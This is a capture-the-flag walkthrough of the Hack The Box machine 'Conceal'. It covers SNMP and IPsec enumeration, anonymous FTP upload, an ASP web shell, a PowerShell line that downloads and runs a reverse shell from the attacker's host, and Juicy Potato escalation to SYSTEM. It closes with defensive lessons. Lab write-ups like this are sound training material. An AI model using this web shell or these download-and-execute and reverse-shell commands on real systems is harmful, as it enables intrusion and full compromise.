Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.116 All
All: Runs all the scans consecutively.
We get back the following result.
root@kali:~/Desktop/htb/conceal# nmapAutomator.sh 10.10.10.116 AllRunning all scans on 10.10.10.116Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:19 EST
Nmap done: 1 IP address (1 host up) scanned in 101.60 seconds---------------------Starting Nmap Basic Scan---------------------No ports in quick scan.. Skipping!----------------------Starting Nmap UDP Scan----------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:20 EST
Nmap scan report for 10.10.10.116
Host is up (0.051s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
500/udp open isakmpNmap done: 1 IP address (1 host up) scanned in 188.61 secondsMaking a script scan on UDP ports: 500Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
/usr/local/bin/nmapAutomator.sh: line 164: 1941 Segmentation fault $nmapType -sCVU --script vulners --script-args mincvss=7.0 -p$(echo "${udpPorts}") -oN nmap/UDP_"$1".nmap "$1"---------------------Starting Nmap Full Scan----------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
Initiating Parallel DNS resolution of 1 host. at 23:23
Completed Parallel DNS resolution of 1 host. at 23:23, 0.02s elapsed
Initiating SYN Stealth Scan at 23:23
Scanning 10.10.10.116 [65535 ports]
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filteredRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27315.03 seconds
Raw packets sent: 131070 (5.767MB) | Rcvd: 2 (168B)Making a script scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 06:59 EST
Error #486: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!---------------------Finished all Nmap scans---------------------
We have one open port.
Port 500: running isakmp
Before we move on to enumeration, let’s make some mental notes about the scan results.
I’m not familiar with the service that is running on port 500. A quick google search tells us that it is the Internet Security Association and Key Management Protocol( ISAKMP) which is commonly called Internet Key Exchange (IKE). A lot of the documentation references configuring IPsec and ISAKMP standards to build VPNs.
So there are probably other ports that are open, however, we won’t be able to see them before we establish that VPN connection. In order to do that, we need some kind of key for authentication and since this is an HTB box, we have to find this key somewhere. So what we’ll do is rerun all the nmap scans to see if we missed any ports the first time around.
Enumeration
Rerunning the UDP scan does give us an extra port.
root@kali:~# nmap -vvv -sU -sV 10.10.10.116
....
Discovered open port 161/udp on 10.10.10.116
Port 161 is open. This usually runs the SNMP service. Let’s check that using nmap.
nmap -p 161 -sU -sC -sV 10.10.10.116
-p: port
-sU: UDP scan
-sC: run default scripts
-sV: version detection
We get back the following result.
The port is running SNMP version 1 and was able to query the service using the default “public” community string. We see that there are a bunch of ports that are open including FTP, HTTP and SMB. We won’t get access to these ports until we establish a secure connection.
For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.
snmpwalk -c public -v 1 10.10.10.116 > snmp-public.txt
Then run the following command to establish the connection.
root@kali:~# ipsec up concealgenerating QUICK_MODE request 1899279807 [ HASH SA No ID ID ]
sending packet: from 10.10.14.7[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.7[500] (188 bytes)
parsed QUICK_MODE response 1899279807 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{32}
CHILD_SA conceal{33} established with SPIs cea2f2d0_i fbdc1ee6_o and TS 10.10.14.7/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 1899279807 [ HASH ]
connection 'conceal' established successfully
Perfect, the connection was established successfully. Now let’s try and run an nmap scan.
root@kali:~/Desktop/htb/conceal# nmap 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:24 EST
Nmap scan report for 10.10.10.116
Host is up (0.047s latency).
All 1000 scanned ports on 10.10.10.116 are filteredNmap done: 1 IP address (1 host up) scanned in 49.03 seconds
The default TCP SYN scan (-sS) does not seem to work, but a TCP connect scan does.
root@kali:~/Desktop/htb/conceal# nmap -sT 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:26 EST
Nmap scan report for 10.10.10.116
Host is up (0.042s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-dsNmap done: 1 IP address (1 host up) scanned in 2.65 seconds
I have no idea why you would need a TCP connect scan for it to work. However, in the interest of moving forward, let’s run a more comprehensive TCP connect scan.
root@kali:~/Desktop/htb/conceal# nmap -sC -sV -sT -o nmap-vpn.text 10.10.10.116Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 20:39 EST
Nmap scan report for 10.10.10.116
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 2m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-28T01:41:47
|_ start_date: 2020-02-27T01:56:42Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.89 seconds
More Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
We get the default Windows Microsoft IIS welcome page. The page source doesn’t contain any sensitive information.
Next, run gobuster to enumerate directories/files.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.116 -o gobuster.txt
dir: directory mode
-w: wordlist
-u: URL
-o: output file
We get back the following result.
Visit the directory in the browser.
It doesn’t contain anything. Let’s see if we can upload files through FTP.
Port 21 FTP
The nmap scan showed anonymous login is allowed.
root@kali:~/Desktop/htb/conceal/upload# ftp 10.10.10.116Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
Let’s test if we’re allowed to upload files. Create a test.txt file on the attack machine.
echo "hello" > test.txt
Upload the test.txt file on the FTP server.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (78.5740 kB/s)
The upload was successful. Let’s see if we can execute the file from the /upload directory on the web server.
Perfect! According to the nmap scan, this is a Microsoft IIS server version 10, so it should be able to execute ASP and ASPX code. Let’s test this out on the web server.
Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
We get an HTTP error saying that the file can’t be served because of the extension configuration. So we can’t upload ASPX files. Next, let’s try an ASP file.
Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.
Initial Foothold
Create a cmd.asp file on the attack machine that contains the following simple web shell.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
The above code executes the whoami command and outputs it on the screen. Upload the cmd.asp file on the FTP server and view it on the browser.
We have code execution! Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
When called, this sends a reverse shell back to our attack machine on port 1234.
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Next, change the cmd.asp file to download the PowerShell script and execute it.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Start up a python server in the directory that the shell script resides in.
python -m SimpleHTTPServer 5555
Upload the cmd.asp file on the FTP server and view it on the browser.
We get a shell! Grab the user.txt flag.
Privilege Escalation
Run the systeminfo command.
PS C:\Users\Destitute\Desktop> systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 27/02/2020, 01:56:19
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,154 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,213 MB
Virtual Memory: In Use: 986 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::4e1:f9b6:e5da:2f16
[03]: dead:beef::71d9:f571:4c90:5dc7
[04]: dead:beef::18b2:9ba4:e093:98b9
[05]: dead:beef::4e1:f9b6:e5da:2f16
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We’re on a Microsoft Windows 10 Enterprise 64-bit OS. Let’s first check the system privileges that are enabled for this user.
SetImpersonatePrivilege is enabled so we’re very likely to get SYSTEM using Juicy Potato. Users running the SQL server service or the IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato exploits the way Microsoft handles tokens in order to escalate local privileges to SYSTEM.
Let’s test it out. Grab the Juicy Potato executable from here and transfer it to the target machine using the following command.
Setup a listener on the attack machine to receive the reverse shell.
nc -nlvp 6666
Then run the Juicy Potato executable. This should attempt to get a token that impersonates SYSTEM and then run our shell.bat file with elevated privileges.
PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
COM -> recv failed with error: 10038
It fails to escalate privileges with the default CLSID. We can get the list of CLSIDs on our system using this script. However, let’s first manually try one of the Windows 10 Enterprise CLSIDs available on the Juicy Potato github repo.
Rerun the Juicy Potato executable with the above specific CLSID.
root@kali:~# nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.116] 49720
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\Windows\system32>whoami
nt authority\system
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited three vulnerabilities.
Outdated version of SNMP and the use of default SNMP community string. The community string essentially acts as a password to gain access to the service. Using the default “public” string, we were able to query SNMP for the IKE VPN hashed password. The administrator should have instead used SNMPv3 since it’s the only version that provides strong authentication and data encryption. If it is necessary that version 1 be used, the administrator should have changed the community string to one that is not easily guessable.
Weak authentication credentials. The shared secret used to establish a secure connection was cracked in a matter of seconds using an online password cracker. The administrator should have either used a stronger shared key that is difficult to crack or considered using asymmetric encryption.
Insecure configuration of FTP server that allowed anonymous login and file upload. The administrator should have disabled anonymous access to the FTP server. If anonymous access was necessary, the administrator should have configured the FTP server to only allow downloads. This way we would not have been able to upload a reverse shell.
To escalate privileges we didn’t necessarily exploit a vulnerability but an intended design of how Microsoft handles tokens. So there’s really not much to do there but put extra protections in place for these sensitive accounts.
